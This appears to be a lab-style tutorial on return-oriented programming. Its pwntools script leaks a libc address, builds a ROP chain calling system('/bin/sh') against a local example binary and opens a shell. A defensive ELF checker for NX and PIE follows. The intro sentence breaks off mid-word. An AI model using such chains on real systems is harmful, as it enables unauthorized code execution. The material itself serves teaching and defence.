Exploitation

ROP (Return-Oriented Programming) is a technique used to bypass security mechanisms such as data execution prevention (DEP) or address space layout randomization (ASLR). It allows us to exploit the ar

Pwntools can build ROP chains, so we'll use it for exploitation.

from pwn import *

elf = context.binary = ELF('./example')
libc = elf.libc
p = process()

# read the address of system() that the binary leaks after the prompt
p.recvuntil(b'Enter name: ')
system_addr = int(p.recvline(), 16)

# rebase libc: base = leaked system() address - offset of system() inside libc
libc.address = system_addr - libc.sym['system']
log.success('LIBC base: {}'.format(hex(libc.address)))

# find a "/bin/sh" string inside libc
binsh = next(libc.search(b'/bin/sh'))

# build the rop chain: 32 bytes of padding, then a call to system("/bin/sh")
rop = ROP(libc)
rop.raw(b'A' * 32)
rop.system(binsh)

# send our rop chain
p.sendline(rop.chain())

# get the shell
p.interactive()
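As an added defender-side check, not part of the original writeup, the script below parses ELF program headers to report the two mitigations the chain above is built around: NX/DEP (a PT_GNU_STACK segment without execute permission) and PIE (e_type ET_DYN, which is what lets ASLR randomise the binary's base). It reports the same properties pwntools exposes as ELF.nx and ELF.pie, but with no pwntools dependency; `elf_mitigations`, `build_elf` and the two sample images are my own constructions, not ./example.

```python
import struct
import sys

# Constants from the ELF specification
ET_EXEC, ET_DYN = 2, 3          # e_type: fixed-address executable vs. position-independent
EM_X86_64 = 62
PT_GNU_STACK = 0x6474E551        # program header carrying the stack's permissions
PF_X = 0x1                       # execute bit in p_flags

def elf_mitigations(data: bytes) -> dict:
    """Return {'nx': bool, 'pie': bool} for a 64-bit little-endian ELF image.

    NX (DEP) holds only when a PT_GNU_STACK header exists *and* lacks PF_X;
    a missing header is reported as NX off, matching checksec/pwntools.
    PIE holds when e_type is ET_DYN, so ASLR can randomise the load base.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    stack_flags = None
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
    return {
        "nx": stack_flags is not None and not (stack_flags & PF_X),
        "pie": e_type == ET_DYN,
    }

def build_elf(e_type: int, phdrs) -> bytes:
    """Construct a minimal ELF64 image (header + program headers) for testing."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    header = ident + struct.pack("<HHIQQQIHHHHHH", e_type, EM_X86_64, 1,
                                 0, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0x10)
                    for t, f in phdrs)
    return header + body

# Constructed sample images, not real binaries: a PIE with a read/write stack,
# and a fixed-address executable whose stack is also executable.
HARDENED = build_elf(ET_DYN, [(PT_GNU_STACK, 0x6)])
LEGACY = build_elf(ET_EXEC, [(PT_GNU_STACK, 0x7)])

if __name__ == "__main__":
    # With a path argument inspect that file; otherwise report on the samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], elf_mitigations(fh.read()))
    else:
        for name, data in (("hardened-sample", HARDENED), ("legacy-sample", LEGACY)):
            print(name, elf_mitigations(data))
```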
